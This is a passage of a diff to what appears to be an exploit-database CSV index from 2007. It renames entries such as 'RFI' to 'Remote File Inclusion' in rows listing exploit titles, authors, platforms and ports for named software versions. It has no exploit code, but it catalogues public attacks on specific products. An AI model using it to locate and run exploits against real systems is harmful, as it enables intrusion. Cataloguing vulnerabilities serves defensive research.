(install_root) Multiple Remote File Inclusion Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 +3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 3611,platforms/php/webapps/3611.txt,"JC URLshrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 -3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository (viewcat.php) Remote SQL Injection Exploit",2007-03-30,ajann,php,webapps,0 -3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - RFI",2007-03-30,bd0rk,php,webapps,0 +3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository (viewcat.php) SQL Injection Exploit",2007-03-30,ajann,php,webapps,0 +3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53 3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 -3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 -3620,platforms/php/webapps/3620.pl,"XOOPS Module Core (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 -3621,platforms/php/webapps/3621.pl,"XOOPS Module Tutoriais (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 +3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 +3620,platforms/php/webapps/3620.pl,"XOOPS Module Core (viewcat.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 +3621,platforms/php/webapps/3621.pl,"XOOPS Module Tutoriais (viewcat.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 3622,platforms/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - (WebMail) Remote Add Super User Exploit",2007-04-01,rgod,php,webapps,0 -3623,platforms/php/webapps/3623.pl,"XOOPS Module eCal <= 2.24 - (display.php) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3624,platforms/php/webapps/3624.txt,"BT-sondage 1.12 - (gestion_sondage.php) RFI",2007-04-01,Crackers_Child,php,webapps,0 -3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event <= 1.01 - (id) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop <= 1.17 - (id) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit",2007-04-01,Heretic2,windows,remote,143 +3623,platforms/php/webapps/3623.pl,"XOOPS Module eCal 2.24 - (display.php) SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3624,platforms/php/webapps/3624.txt,"BT-sondage 1.12 - (gestion_sondage.php) Remote File Inclusion",2007-04-01,Crackers_Child,php,webapps,0 +3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - (id) SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - (id) SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 IMAPD Remote Buffer Overflow Exploit",2007-04-01,Heretic2,windows,remote,143 3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - (INCLUDE_PATH) Remote File Inclusion Vulnerabilities",2007-04-01,GoLd_M,php,webapps,0 -3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail <= 1.1 - (camid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser <= 0.92 - (genre.php) BLIND SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3631,platforms/php/webapps/3631.txt,"Flexphpnews 0.0.5 - (news.php newsid) Remote SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 -3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P <= 2.0 - (cid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - (genre.php) BLIND SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3631,platforms/php/webapps/3631.txt,"Flexphpnews 0.0.5 - (news.php newsid) SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 +3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - (cid) SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0 3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor (.ANI) Remote Overflow Exploit (2)",2007-04-01,"Trirat Puttaraksa",windows,remote,0 3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0 3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0 -3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - (cid) Remote SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 -3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - (cid) Remote SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 -3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - RFI",2007-04-02,"Hamid Ebadi",php,webapps,0 -3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section <= 1.01 - (articleid) SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 -3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection <= 1.07 - (articleid) BLIND SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 -3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) Remote SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 +3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - (cid) SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 +3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - (cid) SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 +3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",php,webapps,0 +3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section 1.01 - (articleid) SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 +3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection 1.07 - (articleid) BLIND SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 +3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 - (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 -3650,platforms/windows/remote/3650.c,"Frontbase <= 4.2.7 - POST-AUTH Remote Buffer Overflow Exploit (2.2)",2007-04-02,Heretic2,windows,remote,0 +3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - POST-AUTH Remote Buffer Overflow Exploit (2.2)",2007-04-02,Heretic2,windows,remote,0 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor (.ANI) Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 -3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog <= 2.52 - (postid) BLIND SQL Injection Exploit",2007-04-03,ajann,php,webapps,0 -3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - (xmlrpc) Remote SQL Injection Exploit",2007-04-03,"Sumit Siddharth",php,webapps,0 -3657,platforms/php/webapps/3657.txt,"MySpeach <= 3.0.7 - Remote/Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0 -3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) RFI",2007-04-04,frog-m@n,php,webapps,0 +3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) BLIND SQL Injection Exploit",2007-04-03,ajann,php,webapps,0 +3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - (xmlrpc) SQL Injection Exploit",2007-04-03,"Sumit Siddharth",php,webapps,0 +3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Remote/Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0 +3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion Vulnerabilities",2007-04-04,kezzap66345,php,webapps,0 -3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Include Exploit",2007-04-04,bd0rk,php,webapps,0 +3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion Exploit",2007-04-04,bd0rk,php,webapps,0 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit",2007-04-04,ri0t,windows,remote,0 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 -3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets <= 1.02 (c) - BLIND SQL Injection Exploit",2007-04-04,ajann,php,webapps,0 +3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - BLIND SQL Injection Exploit",2007-04-04,ajann,php,webapps,0 3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - Privilege Escalation Exploit",2007-04-04,"Marco Ivaldi",windows,local,0 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 mutant_functions.php Remote File Inclusion Exploit",2007-04-04,bd0rk,php,webapps,0 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection Exploit",2007-04-04,ajann,php,webapps,0 -3667,platforms/php/webapps/3667.txt,"Sisplet CMS <= 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 +3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0 -3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 - (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 -3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 -3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 - (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 -3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure",2007-04-05,Trex,php,webapps,0 +3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - (cid) SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 +3671,platforms/php/webapps/3671.php,"phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 +3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - (cid) SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 +3673,platforms/php/webapps/3673.txt,"WebSPELL 4.01.02 - (picture.php) File Disclosure",2007-04-05,Trex,php,webapps,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 -3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server <= 1.01 - (LIST) Remote Buffer Overflow Exploit (2)",2007-04-06,"Umesh Wanve",windows,remote,21 +3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - (LIST) Remote Buffer Overflow Exploit (2)",2007-04-06,"Umesh Wanve",windows,remote,21 3676,platforms/php/webapps/3676.txt,"Beryo 2.0 - (downloadpic.php chemin) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - (download2.php fn1) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 -3678,platforms/php/webapps/3678.php,"SmodBIP <= 1.06 - (aktualnosci zoom) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 -3679,platforms/php/webapps/3679.php,"SmodCMS <= 2.10 - (Slownik ssid) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 +3678,platforms/php/webapps/3678.php,"SmodBIP 1.06 - (aktualnosci zoom) SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 +3679,platforms/php/webapps/3679.php,"SmodCMS 2.10 - (Slownik ssid) SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite - Off-by-one Remote Overflow Exploit (Win32)",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - (smilies.php config) Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] LFI Exploit",2007-04-08,bd0rk,php,webapps,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 -3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - RFI",2007-04-08,the_Edit0r,php,webapps,0 +3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - Remote File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - (index.php menu) Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 - (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"Microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 -3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 +3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - (.ani) Local Buffer Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - (.hlp) Local HEAP Overflow PoC (0Day)",2007-04-09,muts,windows,dos,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0 @@ -3355,24 +3355,24 @@ id,file,description,date,author,platform,type,port 3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,php,webapps,0 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 -3699,platforms/php/webapps/3699.txt,"phpGalleryScript 1.0 - (init.gallery.php include_class) RFI",2007-04-10,anonymous,php,webapps,0 -3700,platforms/php/webapps/3700.txt,"Weatimages <= 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 -3701,platforms/php/webapps/3701.txt,"Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 -3702,platforms/php/webapps/3702.php,"InoutMailingListManager <= 3.1 - Remote Command Execution Exploit",2007-04-10,BlackHawk,php,webapps,0 -3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 - RFI Vulnerabilities",2007-04-10,"Cold Zero",php,webapps,0 +3699,platforms/php/webapps/3699.txt,"phpGalleryScript 1.0 - (init.gallery.php include_class) Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 +3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 +3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 Admin Access Bypass / DB Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 +3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution Exploit",2007-04-10,BlackHawk,php,webapps,0 +3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 - Remote File Inclusion Vulnerabilities",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-php beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 -3705,platforms/php/webapps/3705.txt,"SimpCMS <= 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 -3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery <= 2.5 Beta 2 - RFI Vulnerabilities",2007-04-11,iskorpitx,php,webapps,0 +3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 +3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion Vulnerabilities",2007-04-11,iskorpitx,php,webapps,0 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulnerabilities",2007-04-11,"Cold Zero",php,webapps,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Transversal Exploit",2007-04-11,shinnai,multiple,remote,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 non-existent applet Denial of Service Exploit",2007-04-11,shinnai,multiple,dos,0 -3710,platforms/php/webapps/3710.php,"PunBB <= 1.2.14 - Remote Code Execution Exploit",2007-04-11,DarkFig,php,webapps,0 +3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution Exploit",2007-04-11,DarkFig,php,webapps,0 3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion Exploit",2007-04-11,"John Martinelli",php,webapps,0 -3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - (absolute_path) RFI",2007-04-11,"Cold Zero",php,webapps,0 -3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - RFI",2007-04-11,"Cold Zero",php,webapps,0 -3714,platforms/php/webapps/3714.txt,"joomla component mosmedia <= 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0 +3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 +3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 +3714,platforms/php/webapps/3714.txt,"joomla component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0 3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit",2007-04-12,shinnai,windows,dos,0 -3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) RFI Exploit",2007-04-12,bd0rk,php,webapps,0 +3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) Remote File Inclusion Exploit",2007-04-12,bd0rk,php,webapps,0 3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - (absolute_path) Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - (header.php lang) Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) <= 1.2.2 - (CLIENT-IP) SQL Injection Exploit",2007-04-12,Elekt,php,webapps,0 @@ -3380,56 +3380,56 @@ id,file,description,date,author,platform,type,port 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 3724,platforms/linux/remote/3724.c,"Aircrack-ng 0.7 - (Specially Crafted 802.11 Packets) Remote BoF Exploit",2007-04-12,"Jonathan So",linux,remote,0 -3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 - (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0 +3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0 -3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 - (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 +3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 - (SQL Injection/LFI) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 -3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0 +3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion Vulnerabilities",2007-04-13,GoLd_M,php,webapps,0 -3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Include",2007-04-14,irvian,php,webapps,0 +3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow Exploit",2007-04-15,"Winny Thomas",windows,remote,139 -3738,platforms/windows/remote/3738.php,"XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 -3739,platforms/php/webapps/3739.php,"Papoo <= 3.02 - (kontakt menuid) Remote SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0 +3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 +3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow Exploit",2007-04-15,devcode,windows,remote,139 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion Exploit",2007-04-15,BeyazKurt,php,webapps,0 -3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple RFI Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 +3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - (path) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3746,platforms/windows/remote/3746.txt,"Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (2)",2007-04-18,"Andres Tarasco",windows,remote,445 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 -3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart <= 3.5 - (abs_path) RFI Vulnerabilities",2007-04-16,irvian,php,webapps,0 -3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) RFI Vulnerabilities",2007-04-16,"Alkomandoz Hacker",php,webapps,0 +3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - (abs_path) Remote File Inclusion Vulnerabilities",2007-04-16,irvian,php,webapps,0 +3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion Vulnerabilities",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0 -3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE - 